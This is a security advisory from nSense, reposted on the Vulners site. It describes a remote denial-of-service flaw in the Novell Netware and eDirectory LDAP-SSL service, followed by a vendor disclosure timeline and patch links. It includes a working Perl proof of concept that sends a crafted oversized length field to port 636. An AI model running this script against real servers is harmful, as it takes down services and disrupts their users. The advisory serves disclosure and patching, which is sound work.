Vulners
Lucene search
Novell Netware eDirectory - Denial of Service
nSense Vulnerability Research Security Advisory NSENSE-2011-002
---------------------------------------------------------------
Affected Vendor: Novell
Affected Product: Netware, eDirectory
Platform: Netware / Linux
Impact: Remote Denial of Service
Vendor response: Patch
CVE: None
Credit: Knud / nSense
Technical details
---------------------------------------------------------------
It is possible to cause a Denial of Service in Novell's
LDAP-SSL daemon due to the system blindly allocating a
user-specified amount of memory. Exploiting the issue on a
Netware system will cause a system-wide DoS condition. A script
for replicating the issue is included below:
#!/usr/bin/perl
# usage: ./novell.pl 10.0.0.1 0x41424344
use IO::Socket::SSL;
$socket = new IO::Socket::SSL(Proto=>"tcp",
PeerAddr=>$ARGV[0], PeerPort=>636);
die "unable to connect to $host:$port ($!)\n" unless $socket;
print $socket "\x30\x84" . pack("N",hex($ARGV[1])) .
"\x02\x01\x01\x60\x09\x02\x01\x03\x04\x02\x44\x4e\x80\x00" ;
close $socket; print "done\n";
Timeline:
20100819 Contacted vendor, supplied PoC
20100825 Vendor acknowledges receipt of information
20100826 Vendor creates ticket, SR # 10645215982
20100922 nSense requests status update
20100928 Vendor responds that a fix is being tested
20101109 nSense requests status update
20101112 nSense requests status update
20101112 Vendor responds, fix is still being tested
20101221 nSense requests status update
20101227 Vendor responds, patch is being built
20110124 nSense requests status update
20110127 Vendor responds, patches planned for medio feb 2011
20110320 nSense requests status update
20110329 nSense requests status update
20110329 Vendor responds, other issues discovered in code
20110409 Vendor responds, patch issued for eDirectory
20110409 nSense asks for netware patch date
20110419 nSense asks for netware patch date
20110427 nSense asks for netware patch date
20110504 Vendor responds, netware patch released
Solution
Install the vendor supplied patch.
Netware: http://download.novell.com/Download?buildid=bXPFv5btgsA~
eDirectory: http://download.novell.com/Download?buildid=-KMoN4RVaCQ~
Links:
http://www.nsense.fi http://www.nsense.dk
$$s$$$$s. ,s$$$$s ,S$$$$$s. $$s$$$$s. ,s$$$$s ,S$$$$$s.
$$$ `$$$ ($$( $$$ `$$$ $$$ `$$$ ($$( $$$ `$$$
$$$ $$$ `^$$s. $$$$$$$$$ $$$ $$$ `^$$s. $$$$$$$$$
$$$ $$$ )$$) $$$ $$$ $$$ )$$) $$$
$$$ $$$ ^$$$$$$7 `7$$$$$P $$$ $$$ ^$$$$$$7 `7$$$$$P
D r i v e n b y t h e c h a l l e n g e _Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 May 2011 00:00Current
7.4High risk
Vulners AI Score7.4